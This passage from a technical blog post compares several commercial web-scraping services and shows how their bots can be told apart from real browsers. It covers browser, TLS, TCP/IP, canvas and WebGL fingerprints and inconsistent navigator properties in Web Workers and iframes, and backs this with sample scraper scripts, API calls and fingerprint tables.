<p><a href="https://scrapingbee.com">ScrapingBee</a>: The <a href="https://github.com/fingerprintjs/fingerprintjs">browser fingerprint</a> is identical for all their scraping instances. <code>navigator.platform</code> is still set to <code>Linux x86_64</code> although the User-Agent is either Intel Mac OS X or Windows NT.</p>
</li>
<li>
<p><a href="https://www.scraperapi.com/">scraperapi.com</a>: The same issue here, the <a href="https://github.com/fingerprintjs/fingerprintjs">browser fingerprint</a> is identical for all their scrapers. Weird timezone browser settings of <code>Etc/Unknown</code>, strange default screen dimensions, no WebGL vendor renderer information.</p>
</li>
<li>
<p><a href="https://scrapingrobot.com">scrapingrobot.com</a>: Inconsistent screen dimensions. No plugin information in <code>navigator.plugins</code>. No multimedia devices in <code>navigator.mediaDevices</code>.</p>
</li>
<li>
<p><a href="https://scrapfly.io">scrapfly.io</a>: Inconsistent User-Agent in the HTTP header and in <code>navigator.userAgent</code>. All their scrapers use always the same video card of <em>ANGLE (NVIDIA GeForce GTX 660 Direct3D9Ex vs_3_0 ps_3_0)</em>. No plugin information in <code>navigator.plugins</code>. No multimedia devices in <code>navigator.mediaDevices</code>.</p>
</li>
</ol>
<h2>Detecting <a href="https://luminati.io/">Luminati.io</a></h2>
<p>Luminati is arguably one of the best scraping / proxying services out there, albeit one of the most expensive.</p>
<p>I don't like to admit it, because I don't really dig their <a href="https://documents.trendmicro.com/assets/white_papers/wp-illuminating-holaVPN-and-the-danger-it-poses.pdf">business strategy</a>, but from all of the researched scraping businesses, they are by far the best.</p>
<p>I heavily suspect that they actually use the real browsers
from the users that have installed the <a href="https://hola.org/">hola browser extension</a> for scraping. I cannot explain how else they manage to create such a convincingly real browser profile. <strong>Edit: Found some concrete issues that suggest that the above statement is no longer the case</strong>.</p>
<p>For a long time, Luminati only offered proxies, but they started to offer <a href="https://luminati.io/products/data-collector">data extraction tools</a> using real web browsers.</p>
<p>With Luminati, you can use proxies like that:</p>
<div class="highlight"><pre><span></span><code>curl --proxy zproxy.lum-superproxy.io:22225 --proxy-user lum-customer-xxx:yyy <span class="s2">"https://bot.incolumitas.com/"</span>
</code></pre></div>
<p>But we are more interested in their custom data collector which uses a real browser to proxy their requests.</p>
<p>We create the following <a href="https://luminati.io/cp/data_collector/collectors/c_klxn3iw412l3u3v1g1/code">data collector</a>:</p>
<div class="highlight"><pre><span></span><code><span class="nx">navigate</span><span class="p">(</span><span class="s1">'https://bot.incolumitas.com/'</span><span class="p">);</span>
<span class="nx">wait_for_text</span><span class="p">(</span><span class="s1">'#ja3'</span><span class="p">,</span> <span class="s1">'ja3_digest'</span><span class="p">);</span>
<span class="nx">collect</span><span class="p">({</span>
<span class="nx">url</span><span class="o">:</span> <span class="nx">location</span><span class="p">.</span><span class="nx">href</span><span class="p">,</span>
<span class="p">});</span>
</code></pre></div>
<p>After scraping the <a href="https://bot.incolumitas.com/">bot detection site</a> for a couple of times, those are the fingerprints we manage to obtain: </p>
<table>
<thead>
<tr>
<th>#</th>
<th>ip</th>
<th>user agent</th>
<th>browser fingerprint</th>
<th>ja3 fingerprint</th>
<th>p0f fingerprint</th>
<th>canvas fingerprint</th>
<th>WebGL fingerprint</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>11.22.33.44</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.83 Safari/537.36</td>
<td>ff85adf22012f400f5333f54ffebc916</td>
<td>b32309a26951912be7dba376398abc3b / 7f805430de1e7d98b1de033adb58cf46</td>
<td>Linux 2.2.x-3.x [generic]</td>
<td>DAC6F11B</td>
<td>301740</td>
</tr>
<tr>
<td>2</td>
<td>11.22.33.55</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.83 Safari/537.36</td>
<td>68a9ea61c7ae62f1d9d2c348c1823a2c</td>
<td>b32309a26951912be7dba376398abc3b / 7f805430de1e7d98b1de033adb58cf46</td>
<td>Linux 2.2.x-3.x [generic]</td>
<td>DA9F01B9</td>
<td>301740</td>
</tr>
<tr>
<td>3</td>
<td>11.22.33.66</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36</td>
<td>ffe31d567bd285ba340797681a136cc3</td>
<td>7f805430de1e7d98b1de033adb58cf46 / b32309a26951912be7dba376398abc3b</td>
<td>Linux 2.2.x-3.x [generic]</td>
<td>6CE02F78</td>
<td>301740</td>
</tr>
<tr>
<td>4</td>
<td>11.22.33.77</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36</td>
<td>a00f02fed04ef645c1abb335dfe3e12f</td>
<td>7f805430de1e7d98b1de033adb58cf46 / b32309a26951912be7dba376398abc3b</td>
<td>Linux 2.2.x-3.x [generic]</td>
<td>6FDC3774</td>
<td>301740</td>
</tr>
<tr>
<td>5</td>
<td>11.22.33.88</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36</td>
<td>c0d70db11fc439a78865a0f89f7fa65e</td>
<td>b32309a26951912be7dba376398abc3b / 7f805430de1e7d98b1de033adb58cf46</td>
<td>Windows NT kernel [generic]</td>
<td>D40672D6</td>
<td>301740</td>
</tr>
<tr>
<td>6</td>
<td>11.22.33.99</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36</td>
<td>b631bc196165e8f5931b0388a20eb69f</td>
<td>7f805430de1e7d98b1de033adb58cf46 / b32309a26951912be7dba376398abc3b</td>
<td>Linux 2.2.x-3.x [generic]</td>
<td>5D10FDE8</td>
<td>301740</td>
</tr>
</tbody>
</table>
<p>After a thorough analysis, I have to admit that Luminati.io is doing many things extremely well. </p>
<p>The WebGL fingerprint (which is shortened in the table) is inaccurate. It does not say much that it is always identical. I have the same WebGL fingerprint on my Android phone. The same applies to the TLS fingerprint. There is not enough entropy in this TLS fingerprint to deduce a statement.</p>
<p>The canvas fingerprint and the browser fingerprint do change with every new scraping instance. Just as expected.</p>
<p>The only curious thing is the Linux OS that was detected by <a href="https://github.com/p0f/p0f">p0f</a>. But I do not trust this OS detection feature from p0f all that much. p0f seems quite old and is not really maintained since years. It doesn't event detect Linux kernels newer than 3.x versions.</p>
<p>Maybe we have to dig a bit deeper regarding OS fingerprinting on a TCP/IP level.</p>
<p><a href="https://github.com/xnih/satori">Satori.py</a> looks like a good tool for it with an extensive and <a href="https://github.com/xnih/satori/blob/master/fingerprints/tcp.xml">up to date database</a>. It's written in easy to understand Python and this gives me enough freedom to hack my own logic into it if needed. p0f seems a bit more complicated and not so fast for quick changes in comparison.</p>
<p>So the strategy looks like the following:</p>
<ol>
<li>We collect several <a href="https://luminati.io/">Luminati.io</a> TCP/IP network captures and check the RAW TCP/IP signature that we obtain.</li>
<li>Then we check if this signature is significantly different from the User Agent that Luminati claims to be.</li>
</ol>
<p>After trying for a bit with <a href="https://github.com/xnih/satori">Satori.py</a> I realized that the tool was a huge mess and I ended up creating <a href="https://github.com/NikolaiT/zardaxt">my own TCP/IP fingerprinting tool</a>.</p>
<p>I compiled my <a href="https://github.com/NikolaiT/zardaxt/blob/master/database.json">own TCP/IP fingerprint database</a> and started to compare the Luminati data collector against it.</p>
<p>In almost all cases I got something like this:</p>
<div class="highlight"><pre><span></span><code>{'score': '9.5/9.5', 'os': 'Windows NT 10.0; Win64; x64'}
</code></pre></div>
<p>Luminati claims in it's User-Agent that it is <em>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36</em> and in almost all cases, the TCP/IP fingerprint agrees with that.</p>
<p>I had only one case where I got a TCP/IP fingerprint which I could not properly identify.</p>
<div class="highlight"><pre><span></span><code>[{'score': '6/9.5', 'os': 'Macintosh; Intel Mac OS X 11_2_3'}, {'score': '6/9.5', 'os': 'X11; Linux x86_64'}, {'score': '6/9.5', 'os': 'Windows NT 10.0; Win64; x64'}, {'score': '5/9.5', 'os': 'Windows NT 6.1; Win64; x64; rv:87.0'}]
</code></pre></div>
<p>In that case, I have no exact match in my database. So even if Luminati is lying here, then in only 1/10 cases Luminati.io bots are detectable with TCP/IP fingerprinting. That is by far a too weak signal.</p>
<p>So there must be good way to detect that the traffic coming from <a href="https://luminati.io/">Luminati.io</a> is not humanly generated and thus not organic.</p>
<p>Of course we could say that the lack of human UI interaction events is suspicious. But their bot only stays on the website for a few seconds. Opening a tab and not interacting with the page could also be the result of human behavior.</p>
<p>Maybe Luminati bot traffic is detectable by measuring latency and RTT's. After all, when my theory is correct, they need to route traffic somehow like that:</p>
<div class="highlight"><pre><span></span><code>[Luminati data collector] => [Luminati hola browser extension user] => [bot.incolumitas.com] => and all the way back.
</code></pre></div>
<p>Maybe this information helps us to to something. However, I don't have a clear plan here.</p>
<p>What else is there to try?</p>
<p>I tried to see what DNS servers the data collectors from <a href="https://luminati.io/">Luminati.io</a> are using:</p>
<div class="highlight"><pre><span></span><code><span class="nx">navigate</span><span class="p">(</span><span class="s1">'https://www.dnsleaktest.com/'</span><span class="p">);</span>
<span class="nx">click</span><span class="p">(</span><span class="s1">'input.standard'</span><span class="p">)</span>
<span class="nx">wait_visible</span><span class="p">(</span><span class="s1">'#results tbody tr:nth-of-type(2)'</span><span class="p">,</span> <span class="p">{</span><span class="nx">timeout</span><span class="o">:</span> <span class="mf">30000</span><span class="p">});</span>
<span class="nx">wait_for_text</span><span class="p">(</span><span class="s1">'th.align-right'</span><span class="p">,</span> <span class="s1">'Country'</span><span class="p">);</span>
<span class="nx">wait_visible</span><span class="p">(</span><span class="s1">'td > img.ispcountry'</span><span class="p">);</span>
<span class="nx">collect</span><span class="p">({</span>
<span class="nx">url</span><span class="o">:</span> <span class="nx">location</span><span class="p">.</span><span class="nx">href</span><span class="p">,</span>
<span class="p">});</span>
</code></pre></div>
<p>But it is all perfect:</p>
<figure>
<img src="https://incolumitas.com/images/dnsleakLum.png" alt="DNS Leak" />
<figcaption>Luminati.io data collectors don't leak DNS info<span style="font-size: 60%"></span></figcaption>
</figure>
<p>As a next step I looked if the data collectors supported WebSockets:</p>
<div class="highlight"><pre><span></span><code><span class="nx">navigate</span><span class="p">(</span><span class="s1">'https://websocketstest.com/'</span><span class="p">);</span>
<span class="nx">wait_visible</span><span class="p">(</span><span class="s1">'#results_line'</span><span class="p">);</span>
<span class="nx">collect</span><span class="p">({</span>
<span class="nx">url</span><span class="o">:</span> <span class="nx">location</span><span class="p">.</span><span class="nx">href</span><span class="p">,</span>
<span class="p">});</span>
</code></pre></div>
<figure>
<img src="https://incolumitas.com/images/webSocketsLum.png" alt="DNS Leak" />
<figcaption>Luminati.io also supports webSockets<span style="font-size: 60%"></span></figcaption>
</figure>
<h3>Detecting Luminati.io with the help of creepJS</h3>
<p>Now I decided to see what <a href="https://abrahamjuliot.github.io/creepjs/">creepJS</a> would say about the Luminati.io data collectors:</p>
<div class="highlight"><pre><span></span><code><span class="nx">navigate</span><span class="p">(</span><span class="s1">'https://abrahamjuliot.github.io/creepjs/'</span><span class="p">);</span>
<span class="nx">wait_visible</span><span class="p">(</span><span class="s1">'#headless-detection-results'</span><span class="p">);</span>
<span class="nx">wait_for_text</span><span class="p">(</span><span class="s1">'.headless-rating'</span><span class="p">,</span> <span class="s1">'detected'</span><span class="p">);</span>
<span class="nx">wait</span><span class="p">(</span><span class="s1">'#signature-input'</span><span class="p">);</span>
<span class="nx">scroll_to</span><span class="p">(</span><span class="s1">'#fingerprint-data > div:nth-child(13)'</span><span class="p">);</span>
<span class="nx">click</span><span class="p">(</span><span class="s1">'#toggle-open-creep-lies'</span><span class="p">);</span>
<span class="nx">click</span><span class="p">(</span><span class="s1">'#toggle-open-creep-trash'</span><span class="p">);</span>
<span class="nx">collect</span><span class="p">({</span>
<span class="nx">url</span><span class="o">:</span> <span class="nx">location</span><span class="p">.</span><span class="nx">href</span><span class="p">,</span>
<span class="p">});</span>
</code></pre></div>
<figure>
<img src="https://incolumitas.com/images/creepjsLum.png" alt="creepjs Luminati" />
<figcaption>creepjs gives Luminati.io data collectors the worst possible rating...<span style="font-size: 60%"></span></figcaption>
</figure>
<p>As you can see, the <a href="https://github.com/abrahamjuliot/creepjs">CreepJS bot detection tool</a> gives Luminati Data Collectors the worst rating possible: <strong>F-</strong></p>
<p>But why exactly?</p>
<p>When digging into the results, I found the following inconsistencies with Web Workers:</p>
<ol>
<li>The Web Workers have a inconsistent <code>navigator.platform</code> compared to the normal <code>navigator.platform</code>. In the Web Worker context, it is set to <code>"platform": "Linux x86_64"</code>.</li>
<li>The property <code>navigator.hardwareConcurrency</code> is 2 compared to 4 in the normal window browser context</li>
<li>In General: the <code>navigator</code> property in Web Workers is different in many properties compared to the normal <code>window.navigator</code> property. This should not be the case if the browser has not been tampered with!</li>
</ol>
<p>When visiting the <a href="https://abrahamjuliot.github.io/creepjs/tests/workers.html">CreepJS Web Worker detection site</a> with the Luminati Data Collector tool with the following sraping script</p>
<div class="highlight"><pre><span></span><code><span class="nx">navigate</span><span class="p">(</span><span class="s1">'https://abrahamjuliot.github.io/creepjs/tests/workers.html'</span><span class="p">);</span>
<span class="nx">wait_for_text</span><span class="p">(</span><span class="s1">'#fingerprint-data'</span><span class="p">,</span> <span class="s1">'ua device:'</span><span class="p">);</span>
<span class="nx">scroll_to</span><span class="p">(</span><span class="s1">'#fingerprint-data > div:nth-child(3)'</span><span class="p">);</span>
<span class="nx">collect</span><span class="p">({</span>
<span class="nx">url</span><span class="o">:</span> <span class="nx">location</span><span class="p">.</span><span class="nx">href</span><span class="p">,</span>
<span class="p">});</span>
</code></pre></div>
<p>we get the following results</p>
<figure>
<img src="https://incolumitas.com/images/webworkerLum.png" alt="creepjs Luminati web worker" />
<figcaption>Web Workers leak the true browser behind Luminati data collectors...<span style="font-size: 60%"></span></figcaption>
</figure>
<p>Another issue with the Luminati.io data collector is that it fails to spoof the <code>navigator.platform</code> property in iframes. The corresponding <a href="https://abrahamjuliot.github.io/creepjs/tests/iframes.html">creepJS iframe test</a> illustrates the issues:</p>
<figure>
<img src="https://incolumitas.com/images/iframeLum.png" alt="creepjs Luminati iframe" />
<figcaption>iframes leak the true navigator.platform from Luminati data collectors...<span style="font-size: 60%"></span></figcaption>
</figure>
<p>In conclusion, I can say that Luminati.io is doing a very good job in hiding that their <a href="https://luminati.io/products/data-collector">data collector</a> is an automated bot and not a real human being.</p>
<p>However, they forgot to spoof the <code>navigator.platform</code> property in Web Worker and iframe contexts.</p>
<p>No real Windows 10 Chrome Browser has a <code>navigator.platform</code> of <code>Win32</code> in the normal window object but a value of <code>Linux x86_64</code> in iframes and Web Worker contexts...</p>
<h2>Detecting <a href="https://scrapingbee.com">ScrapingBee</a></h2>
<p>I collected several samples from scrapingbee. I used the following API call:</p>
<div class="highlight"><pre><span></span><code>curl <span class="s2">"https://app.scrapingbee.com/api/v1/?api_key={API_KEY}&url=https%3A%2F%2Fbot.incolumitas.com%2F&wait=4000&block_ads=false&block_resources=false"</span>
</code></pre></div>
<p>Here are some extracted criteria from the seven samples:</p>
<table>
<thead>
<tr>
<th>#</th>
<th>ip</th>
<th>user agent</th>
<th>browser fingerprint</th>
<th>tls fingerprint</th>
<th>tcp/ip fingerprint</th>
<th></th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>107.152.210.73</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</td>
<td>b11a52c168016c4ba71b5275117ccf27</td>
<td>7f805430de1e7d98b1de033adb58cf46</td>
<td>Linux 3.x [generic]</td>
<td></td>
</tr>
<tr>
<td>2</td>
<td>107.173.246.155</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36</td>
<td>b11a52c168016c4ba71b5275117ccf27</td>
<td>b32309a26951912be7dba376398abc3b</td>
<td>Linux 3.x [generic]</td>
<td></td>
</tr>
<tr>
<td>3</td>
<td>209.127.110.235</td>
<td>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36</td>
<td>b11a52c168016c4ba71b5275117ccf27</td>
<td>-</td>
<td>Linux 2.2.x-3.x [generic]</td>
<td></td>
</tr>
<tr>
<td>4</td>
<td>104.144.180.182</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</td>
<td>b11a52c168016c4ba71b5275117ccf27</td>
<td>b32309a26951912be7dba376398abc3b</td>
<td>Linux 3.x [generic]</td>
<td></td>
</tr>
<tr>
<td>5</td>
<td>209.127.98.44</td>
<td>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</td>
<td>b11a52c168016c4ba71b5275117ccf27</td>
<td>-</td>
<td>Linux 2.2.x-3.x [generic]</td>
<td></td>
</tr>
<tr>
<td>6</td>
<td>209.127.105.200</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36</td>
<td>b11a52c168016c4ba71b5275117ccf27</td>
<td>-</td>
<td>Linux 2.2.x-3.x [generic]</td>
<td></td>
</tr>
<tr>
<td>7</td>
<td>107.175.157.30</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</td>
<td>b11a52c168016c4ba71b5275117ccf27</td>
<td>b32309a26951912be7dba376398abc3b</td>
<td>Linux 3.x [generic]</td>
<td></td>
</tr>
<tr>
<td>8</td>
<td>186.179.14.119</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</td>
<td>b11a52c168016c4ba71b5275117ccf27</td>
<td>-</td>
<td>Linux 3.11 and newer</td>
<td></td>
</tr>
</tbody>
</table>
<p>As you can see, the browser fingerprint is in every case the same: <em>b11a52c168016c4ba71b5275117ccf27</em></p>
<p>This is very bad. This means that it is possible to detect user agents with the above fingerprint to be a <a href="https://scrapingbee.com">ScrapingBee</a> bot with relatively high likelihood.</p>
<p>But they made more mistakes:</p>
<p>For example they set the user agent to either </p>
<ol>
<li><em>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</em></li>
<li><em>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36</em></li>
</ol>
<p>but they forget to spoof the <code>navigator.platform</code> property accordingly. It is still set to <code>"platform": "Linux x86_64"</code>. Obviously, that is very suspicious and would get flagged by many bot detection programs.</p>
<p>One issue could be that their browser don't seem to support any multimedia devices:</p>
<div class="highlight"><pre><span></span><code><span class="s2">"multimediaDevices"</span><span class="o">:</span> <span class="p">{</span>
<span class="s2">"speakers"</span><span class="o">:</span> <span class="mf">0</span><span class="p">,</span>
<span class="s2">"micros"</span><span class="o">:</span> <span class="mf">0</span><span class="p">,</span>
<span class="s2">"webcams"</span><span class="o">:</span> <span class="mf">0</span>
<span class="p">}</span>
</code></pre></div>
<p>This is usually very uncommon for normal devices. They at least support one multimedia device.</p>
<h2>Detecting <a href="https://www.scraperapi.com/">scraperapi.com</a></h2>
<p>This is another commercial scraping service. Their scrapers also exhibit some weird behavior.</p>
<p>When scraping with the <a href="https://scraperapi.com">scraperapi.com</a> API for five times with the following API call:</p>
<div class="highlight"><pre><span></span><code>curl <span class="s2">"http://api.scraperapi.com/?api_key={{API_KEY}}&url=http://bot.incolumitas.com/&render=true"</span>
</code></pre></div>
<p>we obtain the following fingerprints:</p>
<table>
<thead>
<tr>
<th>#</th>
<th>user agent</th>
<th>browser fingerprint</th>
<th>ja3 fingerprint</th>
<th>canvas fingerprint</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36</td>
<td>792ce97b0295f6f9f0d89fe974371a84</td>
<td>b32309a26951912be7dba376398abc3b</td>
<td>E5063313</td>
</tr>
<tr>
<td>2</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36</td>
<td>792ce97b0295f6f9f0d89fe974371a84</td>
<td>b32309a26951912be7dba376398abc3b</td>
<td>E5063313</td>
</tr>
<tr>
<td>3</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36</td>
<td>792ce97b0295f6f9f0d89fe974371a84</td>
<td>b32309a26951912be7dba376398abc3b</td>
<td>E5063313</td>
</tr>
<tr>
<td>4</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36</td>
<td>792ce97b0295f6f9f0d89fe974371a84</td>
<td>b32309a26951912be7dba376398abc3b</td>
<td>E5063313</td>
</tr>
<tr>
<td>5</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36</td>
<td>792ce97b0295f6f9f0d89fe974371a84</td>
<td>b32309a26951912be7dba376398abc3b</td>
<td>E5063313</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
<p>It is quite obvious that it is very bad that every browser fingerprint is exactly the same. This means that is possible to state that a website is being scraped whenever a visitor uses a browser fingerprint of <em>792ce97b0295f6f9f0d89fe974371a84</em>.</p>
<p>Some other issues were:</p>
<p>Their scraping browsers have the timezone set to <code>Etc/Unknown</code>. This is very obscure.</p>
<p>You can obtain the timezone with the JavaScript snippet </p>
<div class="highlight"><pre><span></span><code><span class="p">(</span><span class="ow">new</span> <span class="nb">window</span><span class="p">.</span><span class="nb">Intl</span><span class="p">.</span><span class="nx">DateTimeFormat</span><span class="p">).</span><span class="nx">resolvedOptions</span><span class="p">().</span><span class="nx">timeZone</span>
</code></pre></div>
<p>Furthermore, the <a href="https://www.scraperapi.com/">scraperapi.com</a> scrapers have no WebGL support. It is not possible to obtain the video card settings.</p>
<p>Usually, normal browsers have a video card such as:</p>
<div class="highlight"><pre><span></span><code><span class="nt">"videoCard"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"></span>
<span class="w"> </span><span class="s2">"Intel Inc."</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">"Intel Iris OpenGL Engine"</span><span class="w"></span>
<span class="p">]</span><span class="w"></span>
</code></pre></div>
<p>You can obtain your video card brand names with the following script:</p>
<div class="highlight"><pre><span></span><code><span class="p">(</span><span class="kd">function</span> <span class="nx">getVideoCardInfo</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">gl</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="s1">'canvas'</span><span class="p">).</span><span class="nx">getContext</span><span class="p">(</span><span class="s1">'webgl'</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">gl</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="p">{</span>
<span class="nx">error</span><span class="o">:</span> <span class="s2">"no webgl"</span><span class="p">,</span>
<span class="p">};</span>
<span class="p">}</span>
<span class="kd">const</span> <span class="nx">debugInfo</span> <span class="o">=</span> <span class="nx">gl</span><span class="p">.</span><span class="nx">getExtension</span><span class="p">(</span><span class="s1">'WEBGL_debug_renderer_info'</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="nx">debugInfo</span><span class="p">){</span>
<span class="k">return</span> <span class="p">{</span>
<span class="nx">vendor</span><span class="o">:</span> <span class="nx">gl</span><span class="p">.</span><span class="nx">getParameter</span><span class="p">(</span><span class="nx">debugInfo</span><span class="p">.</span><span class="nx">UNMASKED_VENDOR_WEBGL</span><span class="p">),</span>
<span class="nx">renderer</span><span class="o">:</span> <span class="nx">gl</span><span class="p">.</span><span class="nx">getParameter</span><span class="p">(</span><span class="nx">debugInfo</span><span class="p">.</span><span class="nx">UNMASKED_RENDERER_WEBGL</span><span class="p">),</span>
<span class="p">};</span>
<span class="p">}</span>
<span class="k">return</span> <span class="p">{</span>
<span class="nx">error</span><span class="o">:</span> <span class="s2">"no WEBGL_debug_renderer_info"</span><span class="p">,</span>
<span class="p">};</span>
<span class="p">})()</span>
</code></pre></div>
<p>Furthermore, their scrapers advertise that they don't have any multimedia devices attached to it:</p>
<div class="highlight"><pre><span></span><code><span class="s2">"multimediaDevices"</span><span class="o">:</span> <span class="p">{</span>
<span class="s2">"speakers"</span><span class="o">:</span> <span class="mf">0</span><span class="p">,</span>
<span class="s2">"micros"</span><span class="o">:</span> <span class="mf">0</span><span class="p">,</span>
<span class="s2">"webcams"</span><span class="o">:</span> <span class="mf">0</span>
<span class="p">}</span>
</code></pre></div>
<p>Another strange thing are the screen dimensions:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"outerWidth"</span><span class="p">:</span><span class="w"> </span><span class="mi">1440</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"outerHeight"</span><span class="p">:</span><span class="w"> </span><span class="mi">800</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"innerWidth"</span><span class="p">:</span><span class="w"> </span><span class="mi">800</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"innerHeight"</span><span class="p">:</span><span class="w"> </span><span class="mi">600</span><span class="p">,</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>Having a inner screen width x height of 800x600 is not prohibited, it is just very uncommon with real devices. But it is very common with default puppeteer chromium browsers...Just saying.</p>
<h2>Detecting <a href="https://scrapingrobot.com">scrapingrobot.com</a></h2>
<p>When scraping with <a href="https://scrapingrobot.com">scrapingrobot.com</a> five times, we obtain the following fingerprints:</p>
<table>
<thead>
<tr>
<th>#</th>
<th>user agent</th>
<th>browser fingerprint</th>
<th>ja3 fingerprint</th>
<th>canvas fingerprint</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36</td>
<td>a265019e42a330492b5182c3a7275db9</td>
<td>66918128f1b9b03303d77c6f2eefd128</td>
<td>4EDA6E5B</td>
</tr>
<tr>
<td>2</td>
<td>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15</td>
<td>9e945fadfdea5733f328c54542afb842</td>
<td>66918128f1b9b03303d77c6f2eefd128</td>
<td>4EDA6E5B</td>
</tr>
<tr>
<td>3</td>
<td>Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36</td>
<td>eae9223cec3ad4985340f60fcb5f7e1f</td>
<td>-</td>
<td>4EDA6E5B</td>
</tr>
<tr>
<td>4</td>
<td>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.41 YaBrowser/21.2.0.1122 Yowser/2.5 Safari/537.36</td>
<td>310f1133a18911b800f465e6f783c7b2</td>
<td>66918128f1b9b03303d77c6f2eefd128</td>
<td>4EDA6E5B</td>
</tr>
<tr>
<td>5</td>
<td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36</td>
<td>c877493938932c04567b0f967507f56d</td>
<td>-</td>
<td>4EDA6E5B</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
<p>As you can see, the browser fingerprint switches all the time. This is a good sign and prevents the easiest route of detection. Regarding fingerprinting, I don't see too many issues with <a href="https://scrapingrobot.com">scrapingrobot.com</a>. </p>
<p>However, there are some other issues with <a href="https://scrapingrobot.com">scrapingrobot.com</a>:</p>
<p>The scrapers of scrapingrobot are using the following screen size properties:</p>
<div class="highlight"><pre><span></span><code><span class="nt">"dimensions"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"window.outerWidth"</span><span class="p">:</span><span class="w"> </span><span class="mi">800</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"window.outerHeight"</span><span class="p">:</span><span class="w"> </span><span class="mi">600</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"window.innerWidth"</span><span class="p">:</span><span class="w"> </span><span class="mi">2470</span><span class="p">,</span><span class="w"></span>
